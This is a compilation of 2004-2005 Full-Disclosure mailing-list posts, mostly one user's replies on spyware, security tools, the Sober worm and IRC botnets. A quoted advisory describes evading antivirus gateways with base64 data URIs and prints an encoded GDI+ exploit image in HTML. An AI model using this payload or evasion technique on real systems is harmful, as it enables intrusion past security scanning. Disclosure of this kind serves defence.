[Full-Disclosure] No such thing as spyware
From: http://www.viruslist.com/en/weblog Thoughts? No such thing as spyware Eugene March 03, 2005 | 22:21 MSK The rising number of cyber-criminals creating more and more different malicious programs, attacks and cyber-frauds have resulted in the media and public paying more attention to security issues. New solutions and services, such as patch and vulnerability management, intrusion prevention, etc., appeared during the last year or so. New threats are appearing as well. But are they really all that new? Spyware is a brand new word in the threats list and it is being used widely. Everyone is talking about spyware: many dedicated anti-spyware products have appeared on the market, all of them brand new. But what exactly is spyware? What threats does new term cover? My favorite definition of the term can be found at Information week. Spyware is software that's installed without your informed consent. Spyware communicates personal, confidential information about you to an attacker. The information might be reports on your Web-surfing habits, or the software might be looking for even more sinister information, such as sniffing out your credit card numbers and reporting those numbers. Exactly. This is a good definition which we can use to describe software designed to spy on user actions and report on infected machines. Did we have such software in the past? Of course we did. The first malicious software designed to spy and steal confidential information was detected back in 1996 - the AOL Password-Stealing Trojans. Have we already seen other malicious programs which can be described as spyware? Certainly! There are many different kinds of Trojans designed to: * steal passwords/logins (including bank account information) * log user activity (keyboard, screenshots, applications being run) * backdoor trojans which have spy abilities Thus, what people are calling spyware is not new at all... Anything else that can be called spyware? Yes. Numerous advertising tools (adware/advware) which report such information as visited Web pages and Web search requests. Sometimes this information is confidential. And there's even more. Legitimate keyloggers for example, freeware/shareware/commercial utilities which log keystrokes and/or monitor other user activities. Are we done? No, there are still more programs that report user information to outside sources. For example, if you post to a forum your email client will report your email address. If you are browsing the Internet your IP address, Windows and browser version can all be logged as you surf. Can we or should we class these programs as spyware? Definitely not. This is where we reach the border between so-called spyware and non-spyware. And the border is fuzzy. Because the issue is not always what the program does, but how it's being used. We call the border-line programs riskware, and detect many of them as 'not-a-virus'. We leave it up to users to decide what to do next: if they want or need the program, they can keep it. However, if it was installed without their consent or is doing something they don't want or need, we find it for them, so they know what's going on in their computer and can make an informed choice. So, technically speaking, spyware simply doesn't exist as a stand-alone cyberthreat. The programs which are being called spyware are, from a technical point of view, simply a limited sub-set of Trojans, advertising software and some riskware: * Trojan spies and some backdoors * most adware * riskware potentially hostile programs that require users to make conscious choices about using them In short, there is no such thing as spyware. On the other hand there are many anti-spyware programs produced by vendors who actively promote their products as dedicated anti-spyware solutions. An interesting review was published in latest PC Magazine {USA edition, Feb 22 2005, pages 82-91}. They compared how a number of security suites (anti-viruses) and dedicated anti-spyware products removed so-called spyware. Guess what? Some traditional solutions are better at removing these threats than dedicated ones. Unfortunately, there are no adequate consumer tests to separate effective solutions from ersatz-security programs. In the PC Magazine tests, there were only 24 spyware samples tested. In reality, there are hundreds of malicious programs in the wild that fit into this category. For instance, we know of over 200 adware families (with numerous variants in each). We need better and more in-depth tests in the future. To cut a long story short, the term spyware is basically a marketing gimmick: just to separate new ersatz-security products from traditional ones, just to push almost zero-value products to the security market. We need to avoid this trap. There is nothing worse for the computer security community than
[Full-Disclosure] Windows Registry Analzyer
Anyone know of any free tools to analyze what changes have been made to a Windows 2000/XP registry? Thanks, ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows Registry Analzyer
On Thu, 3 Mar 2005 16:14:03 -, Cassidy Macfarlane [EMAIL PROTECTED] wrote: You can, of course, use regmon (sysinternals.com) to monitor the registry 'live' while changes are being made, however it sounds like you want a product that would analyse the reg, then re-analyse after installation, and report on changes. This would indeed be a handy tool. Anyone know of anything better than regmon for this purpose? You read my registry, I mean, mind. Thanks everyone for your suggestions. So far, the following has been tossed my way: 1) WinINSTALL LE - it's on every Windows 2000 Pro CD I've ever seen *I will look into this one. 2) Regmon of course, from Sysinternals *Which from my understanding only states what changes are being made in real time. 3) Regshot *Never head of it, but will give it a go. That's it so far. I will post my results. Cheers, ...D ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] PivX Solutions
On Fri, 25 Feb 2005 20:17:44 + GMT, Jason Coombs [EMAIL PROTECTED] wrote: Regarding PivX Solutions, Anyone who has any information about PivX Solutions, please contact me as soon as possible. Don't you work for PivX? What information could you be looking for? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Mouseover URL spoof with IE
Can the URL displayed on a mouseover in IE, be spoofed? Thank you, ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft to buy Sybari AV company
On Tue, 8 Feb 2005 17:51:16 +0100 (CET), Feher Tamas [EMAIL PROTECTED] wrote: http://news.zdnet.com/2100-1009_22-5567529.html GeCad RAV, GIANT and now Sybari Antivirus. Microsoft swallows smaller anti-malware firms one by one. When the last one is gone, MS will probably eat the larger ones, too. Finally all kind of desktop and server security will be owned by MS and W.H.G. III will rule. The hidden message behind all of these acquisitions that Microsoft doesn't want you to know: Microsoft is admitting their software is horribly insecure and their solution to the problem is to acquire re-active based anti-malware software to cleanup the crap that got in because their software has more holes than the screen in my patio door. Further, if Microsoft thinks acquisitions will solve all of their problems, why don't they acquire a company with programmers that have some clue about security and it's place in software that is plugged into a network. Who are they fooling! (Well, sadly, most people except for those reading this email.) Happy patching, ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Google.com down?
On Fri, 14 Jan 2005 18:14:32 -0600, Ron [EMAIL PROTECTED] wrote: I just tried to do a google search, and the connection timed out. Coincidentally, I had to dial back into the Internet. After dialing back in, I figured I'd alert everybody that Google might be down! I just tried to do a google search, and the connection timed out. I don't understand how this could happen to me. I mean, my ISP never goes down, my Windows XP TCP/IP stack and DNS resolve cache never lose their brains, and my Internet Exploiter cache and cookies never cause me problems. Google: fix your servers! drip... dripdrip... it reeks like sarcasim in here. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?
On Tue, 11 Jan 2005 15:13:45 -, Mike Diack [EMAIL PROTECTED] wrote: Where are they? They are probably patching their patch release system. :) Expect them in a couple of hours. Patience grasshopper, patience... ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Multi-vendor AV gateway image inspection bypass vulnerability January 10, 2005 A vulnerability has been discovered which allows a remote attacker to bypass anti-virus (as well other security technologies such as IDS and IPS) inspection of HTTP image content. By leveraging techniques described in RFC 2397 for base64 encoding image content within the URL scheme. A remote attack may encode a malicious image within the body of an HTML formatted document to circumvent content inspection. For example: http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php The source code at the URL above will by default create a JPEG image that will attempt (and fail without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee), however, when the same image is base64 encoded using the technique described in RFC 2397 (documented below), inspection is not performed and is delivered rendered by the client. While Microsoft Internet Explorer does not support the RFC 2397 URL scheme; Firefox, Safari, Mozilla and Opera do and will render the data and thus successfully execute the payload if the necessary OS and/or application patches have not been applied. ## BEGIN HTML ## html body img src=data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD// gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAA AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBX0BAgMABBEFEiExQQYTUWEHInEUMoGR oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEB AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD// Z /body /html ## END HTML ## Solution: While AV vendor patches are not yet available, fixes for all currently known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame. Contributions: Thanks to Scott Roeder and Jacinto Rodriquez their assistance in platform testing. I believe TrendMicro's OfficeScan (client-server scanner) will catch it, but I am not sure about their gateway device. What was their response? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #2093 - 36 msgs
There is a security update, I just noticed it. x-tad-smaller Security Update 2004-12-02 delivers a number of security enhancements and is recommended for all Macintosh users. This update includes the following components: Apache AppKit HIToolbox Kerberos Postfix PSNormalizer Safari Terminal For detailed information on this Update, please visit this website: /x-tad-smallerx-tad-smallerhttp://www.info.apple.com/kbnum/n61798/x-tad-smallerx-tad-smaller /x-tad-smaller On 2-Dec-04, at 3:32 PM, Randall Craig wrote: On Thu, 2 Dec 2004 10:58:02 -0600, Randall Craig [EMAIL PROTECTED]> wrote: Ok I am super duper new to this list and also new to *nix... i will never go back to M$ ceptin for gaming purposes... I am running on OS X.3.3 and was wanting to know if the Security Alert pertaining to FreeBSD would also affect my system. I know that BSD is running underneath OS X... I am fairly sure that Apple is aware of it by now-. thnx n0 r3m0r53 ### FreeBSD-SA-04:17.procfs Security Advisory The FreeBSD Project Topic: Kernel memory disclosure in procfs and linprocfs Category: core Module: sys Announced: 2004-12-01 Credits: Bryan Fulton, Ted Unangst, and the SWAT analysis tool Coverity, Inc. Affects: All FreeBSD releases Corrected: 2004-12-01 21:33:35 UTC (RELENG_5, 5.3-STABLE) 2004-12-01 21:34:23 UTC (RELENG_5_3, 5.3-RELEASE-p2) 2004-12-01 21:34:43 UTC (RELENG_5_2, 5.2.1-RELEASE-p13) 2004-12-01 21:33:57 UTC (RELENG_4, 4.10-STABLE) 2004-12-01 21:35:10 UTC (RELENG_4_10, 4.10-RELEASE-p5) 2004-12-01 21:35:57 UTC (RELENG_4_8, 4.8-RELEASE-p27) CVE Name: CAN-2004-1066 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit URL:http://www.freebsd.org/security/>. I. Background The process file system, procfs(5), implements a view of the system process table inside the file system. It is normally mounted on /proc, and is required for the complete operation of programs such as ps(1) and w(1). The Linux process file system, linprocfs(5), emulates a subset of Linux's process file system and is required for the complete operation of some Linux binaries. II. Problem Description The implementation of the /proc/curproc/cmdline pseudofile in the procfs(5) file system on FreeBSD 4.x and 5.x, and of the /proc/self/cmdline pseudofile in the linprocfs(5) file system on FreeBSD 5.x reads a process' argument vector from the process address space. During this operation, a pointer was dereferenced directly without the necessary validation steps being performed. III. Impact A malicious local user could perform a local denial of service attack by causing a system panic; or he could read parts of kernel memory. Such memory might contain sensitive information, such as portions of the file cache or terminal buffers. This information might be directly useful, or it might be leveraged to obtain elevated privileges in some way. For example, a terminal buffer might contain a user-entered password. FreeBSD 4.x does not implement the /proc/self/cmdline pseudofile in its linprocfs(5) file system, and is therefore only affected if the procfs(5) file system is mounted. In its default configuration, FreeBSD 5.x does not utilize procfs(5) or linprocfs(5) and will therefore be unaffected by this vulnerability unless the configuration is changed. IV. Workaround Unmount the procfs and linprocfs file systems if they are mounted. Execute the following command as root: umount -A -t procfs,linprocfs Also, remove or comment out any lines in fstab(5) that reference `procfs' or `linprocfs', so that they will not be re-mounted at next reboot. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 4-STABLE or 5-STABLE, or to the RELENG_5_3, RELENG_5_2, RELENG_4_10, or RELENG_4_8 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 4.8, 4.10, 5.2, and 5.3 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 4.x] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:17/procfs4.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:17/procfs4.patch.asc [FreeBSD 5.x] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:17/procfs5.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:17/procfs5.patch.asc b) Apply the patch. # cd /usr/src # patch /path/to/patch c) Recompile your kernel as described in URL:http://www.freebsd.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the
[Full-Disclosure] makelovenotspam website defaced
Lycos' anti-spammer DoS screensaver download website may have been defaced: http://www.f-secure.com/weblog/ What a defacing week so far... ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Network Sniffing
On Tue, 30 Nov 2004 13:39:02 -0500, Crehan, Joe (EM, ITS, Contractor) [EMAIL PROTECTED] wrote: Gentleman, I have been having all kinds of quirky network problems at one of my facilities. I always used SnifferPro to identify top talkers and babbling machines. Now that I work for The Hive I am no longer allowed to purchase licenses for such wonderful products. So the question is more of a poll of what the best of the best use for there networks. M$ and *NIX cheap and free. ntop. Ethereal. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Network Sniffing
On Tue, 30 Nov 2004 13:08:12 -0700, Ben Nelson [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Take a look at: http://www.insecure.org/tools.html [...] Note: The FBI is monitoring HTTP logs from insecure.org. http://slashdot.org/article.pl?sid=04/11/25/1835238from=rss ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Is www.sco.com hacked?
On Mon, 29 Nov 2004 14:58:25 +0200, Rossen Naydenov [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi guys, I just noticed the banner on www.sco.com If you don't saw it( because it is removed) this is what they say: We own all your code pay us all your money Or is it some commercial trick? Hacked... see www.neowin.net for a screenshot. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Tue, 23 Nov 2004 20:21:45 +0100, nicolas vigier [EMAIL PROTECTED] wrote: Are you really serious ? Is it a joke ? Dude, I am seriously a naive idiot who just wanted to rant about the people that abuse IRC. Hopefully this was just a momentary brain fart, otherwise I might be in trouble, eh? Often there is humour in such circumstances; I had a few laughs in the process. Shit! Maybe I will meet my future wife on IRC! I would invite everyone from F-D. This remind me some stupid article I read on nytime : http://www.nytimes.com/2004/05/06/technology/circuits/06chat.html (account required, if you don't have one try ptramo/ptramo) What a stupid article. The author has it all wrong! IRC is a bed of roses with Celine Dion playing in the background. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 17:10:13 -0500, Tim [EMAIL PROTECTED] wrote: My mistake; I was referring to the discussion, collaboration, and creation, not the spread. You mentioned DDoS attacks below. I don't believe that use is a form of discussion, collaboration, or creation. Some say we should, but I am not one of those. My point was to get rid of the most well established tool (and easiest to use) for these types of activities. Any tool can be used by anyone for good or evil. If one knows the kiddies are all hanging out on IRC, then you can get a lot of good info about what their new attacks are by loitering on their channels. What's the difference? IRC is so well established for the type of activity I am referring to. As it is established for many productive things. Ever check out freenode? I'll leave the piracy battle for someone else - I just mentioned it as a part of the problem. If you aren't prepared to defend it on this list, better not mention it. =) Sure netcat is an alternative, but which one is easier to use? Um... netcat, or raw tcp sockets. I would argue it is easier to write something that just opens a connection, and listens for commands to come back, than something that has to speak IRC. Speaking IRC has its own advantages, but in the absence of it, it is still trivial to manage a bot net. I thought I would throw out the idea. If you want to call me a troll, then so be it, but don't get your panties in a knot over the whole thing Pardon my harsh reply. It wasn't personal, and is directed only at your reasoning. It is a similar reasoning that leads to the slippery slope toward censorship. No worries. Case closed. :) ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sober.I worm is here
On Fri, 19 Nov 2004 14:39:13 -0600, Bowes, Ronald (EST) [EMAIL PROTECTED] wrote: How does it infect somebody if it's using a .txt file? They (peoples uneducated in Windows file extenstions) think it's a txt file. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around? (Because anything less would be uncivilized)
On Fri, 19 Nov 2004 22:48:46 +, Andrew Smith [EMAIL PROTECTED] wrote: Well, fellow F-D'ers, thanks to the vast array of intelligence and experience found on this list, my rant about abolishing IRC has been proven to be far from a solution. I..can't tell if it's sarcasm or not, damn those trolls and their mind poisoning ways. I am serious. That concludes this topic. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 13:54:30 -0500, bkfsec [EMAIL PROTECTED] wrote: Danny wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? I don't think that it would have any impact at all with regard to stopping malware and crackers. Even if the legitimate IRC servers were shut down, it would still be a simple matter for them to create their own servers on non-standard ports. Barring their ability to do that, they'll completely move to IM or P2P protocols (like WASTE) to carry out their attacks. They've already created the tools to do this and they're actively doing it right now. In fact, in this regard IRC is a godsend with regard to tracking down attackers. It's easier to determine the location of an IRC bot and to track unencrypted IRC traffic than it is to track WASTE packets or IM connections. Protocols (and their implementations) aren't causing the illegal activity as much as the drive to carry out illegal acts is. Fair enough... I just need to be enlightened. Thanks for your time. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 14:47:31 -0500, Keith Pachulski [EMAIL PROTECTED] wrote: how bout because it is entertaining and it is an easy way to communicate with a large group of ppl at once So that trumps it's infestion of illegal activites? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 14:55:12 -0500, Keith Pachulski [EMAIL PROTECTED] wrote: been on yahoo lately? or AOL channels or hell how bout gnutella? Do they organize zombies, foster the creation of backdoors, round up DoS attacks? Sure, getting rid of the big piracy rings would be nice, but I am focusing on the malware, zombies, bots, organized DoS attacks, etc. aspect of IRC. ..D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Why is IRC still around?
Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sober.I worm is here
On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists [EMAIL PROTECTED] wrote: can you define medium sized epidemic? Any new features / functionality? Not too much, except for the fact that it also arrives with the following attachment extenstions: .doc, .txt, and .word Which are not typically blocked by layer 7 aware firewalls. Whereas, the biggies .scr, .pif, .exe, .com, .bat, etc., are usually blocked. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 12:17:09 -0800, Mister Coffee [EMAIL PROTECTED] wrote: Danny wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? And? There are a hell of a lot of normal users on IRC too who don't wreck havoc. A lot of spam comes in email. Does that make email bad? 2) A considerable amount of script kiddies originate and grow through IRC? And AIM, ICQ, Jabber, web-forums, mailing lists, etc. IRC is one medium amungst many. 3) A wee bit of software piracy occurs? Some, perhaps. But unlike, say BitTorrent or Kazaa, IRC's primary role is communication rather than file transfer. You could make the same argument for ANY of the IM clients that support file transfer. 4) That many organized DoS attacks through PC zombies are initiated through IRC? Many do. Yes. But many also originate through other media, and, again, it's not the medium's fault that people use it for nefarious purposes. Hitmen get calls on their cell phones. Should we eliminate cell phones to stop the hitmen? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Anonymity is not a bad thing in many, man, respects. And the list of legitimate uses goes on and on as well. Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? No offense. But the arguments aren't especially strong. We're not pushing to sunset the IRC protocol because there are still thousands and thousands of -legitimate- users in the world. Unlike most IM systems, the IRC nets are completely independant. There are some serious advantages to that. What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? Yes? IRC is a protocol. A tool like any other. Last I looked there were still hundreds to thousands of IRC users at any given time who were there just to hang out and BS with their friends. It's still a valid community if you will, in spite of the nefarious uses other people have put it to. If you sunset something like IRC, the 3v1L [EMAIL PROTECTED] will just move their bots and trojans somewhere else. Well said. Thanks for your time. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around? (Because anything less would be uncivilized)
Well, fellow F-D'ers, thanks to the vast array of intelligence and experience found on this list, my rant about abolishing IRC has been proven to be far from a solution. Maybe I will throw my suggestion in as Feature Request for Internet2. :D ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 14:47:36 -0600, Bowes, Ronald (EST) [EMAIL PROTECTED] wrote: How exactly do you propose to accomplish this? IRC is an open protocol and there are many open clients and open servers which can run on any port, and run encrypted with SSL. So do you intend to scan every computer on the Internet on port 6667, and shut down every server found running, the move on to random ports that zombies probably use, and start attacking sites that provide open source clients that use an open protocol? Your suggestion makes no sense, and it's something that's impossible to implement. Why not just make knives illegal? I mean, they're frequently used as a weapon, right? Yah, you are right. I just needed to rant when I see all these trojan's written to call home (to an IRC channel) and DoS attacks coordinated via IRC to control unpatched anti-virus-less Windows PC zombies. Next topic... ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 15:54:54 -0500, Tim [EMAIL PROTECTED] wrote: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? Isn't email the primary spreading mechanism of viruses? My mistake; I was referring to the discussion, collaboration, and creation, not the spread. should we sunset email? Some say we should, but I am not one of those. My point was to get rid of the most well established tool (and easiest to use) for these types of activities. 2) A considerable amount of script kiddies originate and grow through IRC? And if there were no IRC, they would use AIM, or MSN messenger, or more likely, jabber. What's the difference? It is popular amongst hackers (of any level of morality) because it is open. What's the difference? IRC is so well established for the type of activity I am referring to. 3) A wee bit of software piracy occurs? And it doesn't on any other protocol? People who want to pirate will do it using whatever tools are available. Take away one, and others will be used. I'll leave the piracy battle for someone else - I just mentioned it as a part of the problem. 4) That many organized DoS attacks through PC zombies are initiated through IRC? It wouldn't be any harder to pull this off via netcat. If it is the anonymity an attacker wants, they just use one of the zombies as the server. Sure netcat is an alternative, but which one is easier to use? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? How is it any more anonymous than email, or web, or any other unauthenticated protocol? My point was to get rid of the most well established tool (and easiest to use) for these types of activities. You obviously can't get rid of them all. Please don't tell me you trust the From: header in your email, or believe that all of the IPs in your weblogs are directly tied to a person's home PC. And all these years frig! The list goes on and on... Yes, but every one of those arguments is horribly flawed. I am not sure if you are just being a troll or what. I thought I would throw out the idea. If you want to call me a troll, then so be it, but don't get your panties in a knot over the whole thing Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? Am I narrow minded to say that it would be a much safer place? yes, you are being narrow-minded. Fair enough. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
On Wed, 17 Nov 2004 04:23:52 -0600, Curt Purdy [EMAIL PROTECTED] wrote: Danny wrote: The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low. Insecure replied: Even when the Secret Service admits that they took over the site and put up their own page, you don't believe it? Must be nice to have such blind faith in the integrity of your government enforcement agencies. Duh... I don't know whether it's you folks who doomed us to another 4 years of hell trying to justify your own blind faith or what, but it's time you all woke up to reality. Good Morning America! Our government is no more (as) ethical as any other country. Whether it is our agents murdering a South American dictator we don't happen to like, or our agents defacing a cracker's site, it happens. Obviously you slept through the weeks of cyberwar our (paid) hackers fought with China's (paid) hackers after they downed our jet a while back. It was China who finally called a truce in their official press. Sorry to give you people the bad news, but Bambi died a while ago. It's the wild west in 1800 and there is no law. If you want to survive, you better have a hired gun and we go for $300/hour these days. At least those of us who have met the black hat on main street at 50 paces at high noon and walked away to tell about it. 1) I am not a US citizen, nor do I live in a US state, and quite frankly, I would be scared to live in a country under the control of George W. Bush. 2) Yes, it was difficult to tell that I was kidding, but notice the end of my email ...D is also a big smile. 3) I can count to three. Yippeee ...D ___ 